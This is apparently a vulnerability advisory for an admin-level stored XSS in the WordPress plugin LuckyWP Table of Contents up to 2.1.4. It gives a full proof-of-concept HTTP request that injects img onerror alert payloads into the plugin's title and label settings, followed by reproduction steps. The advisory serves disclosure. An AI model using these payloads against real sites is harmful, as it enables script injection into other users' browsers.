LuckyWP Table of Contents <= 2.1.4 - Admin+ Stored XSS

Description The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)

PoC

Request: POST /wordpress/wp-admin/options.php HTTP/1.1 Host: localhost:8888 Content-Length: 854 Origin: http://localhost:8888 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://localhost:8888/wordpress/wp-admin/options-general.php?page=lwptoc_settings&amp;tab;=general Cookie: wordpress_2b7738476b2cfaf3b5454b1e89821e63=admin%7C1708766444%7C0GzMU59sZAvkYhj8ehqGOkvfh3o3aydrJhg1ZMemE1P%7C22974de7e91d95312e8cefa5f5c339f1696e50a12ec00e68ab0488447c2cafbf; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=pl_PL; wordpress_logged_in_2b7738476b2cfaf3b5454b1e89821e63=admin%7C1708766444%7C0GzMU59sZAvkYhj8ehqGOkvfh3o3aydrJhg1ZMemE1P%7C2d06dac1007e1bc6a183a19f4f01d66fecd7b809d5785a7974a3edc1a0dca85d; wp-settings-1=libraryContent%3Dupload%26editor%3Dhtml%26post_dfw%3Doff%26posts_list_mode%3Dlist; wp-settings-time-1=1708593645 Connection: close option_page=lwptoc_general&action;=update&_wpnonce=e60641c07f&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dlwptoc_settings%26tab%3Dgeneral&lwptoc;_general%5Bmin%5D=&lwptoc;_general%5Bdepth%5D=6&lwptoc;_general%5Bhierarchical%5D=0&lwptoc;_general%5Bhierarchical%5D=1&lwptoc;_general%5Bnumeration%5D=decimalnested&lwptoc;_general%5BnumerationSuffix%5D=none&lwptoc;_general%5Btitle%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&lwptoc;_general%5Btoggle%5D=0&lwptoc;_general%5Btoggle%5D=1&lwptoc;_general%5BlabelShow%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%282%29%3E&lwptoc;_general%5BlabelHide%5D=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%283%29%3E&lwptoc;_general%5BhideItems%5D=0&lwptoc;_general%5BhideItems%5D=1&lwptoc;_general%5BsmoothScroll%5D=0&lwptoc;_general%5BsmoothScroll%5D=1&lwptoc;_general%5BsmoothScrollOffset%5D=&submit;=Zapisz+zmiany Response: HTTP/1.1 200 OK Server: nginx/1.19.2 Date: Thu, 22 Feb 2024 09:42:58 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Referrer-Policy: strict-origin-when-cross-origin X-Frame-Options: SAMEORIGIN Content-Length: 48359 […] ">
Label Hide | "> | "> […] 1. Go to the plugin’s settings. 2. Insert the following payload into the Title, Label Show, and Label Hide fields: "> 3. Add the Table of Contents to a post/page using the Block Editor. 4. The alert will trigger.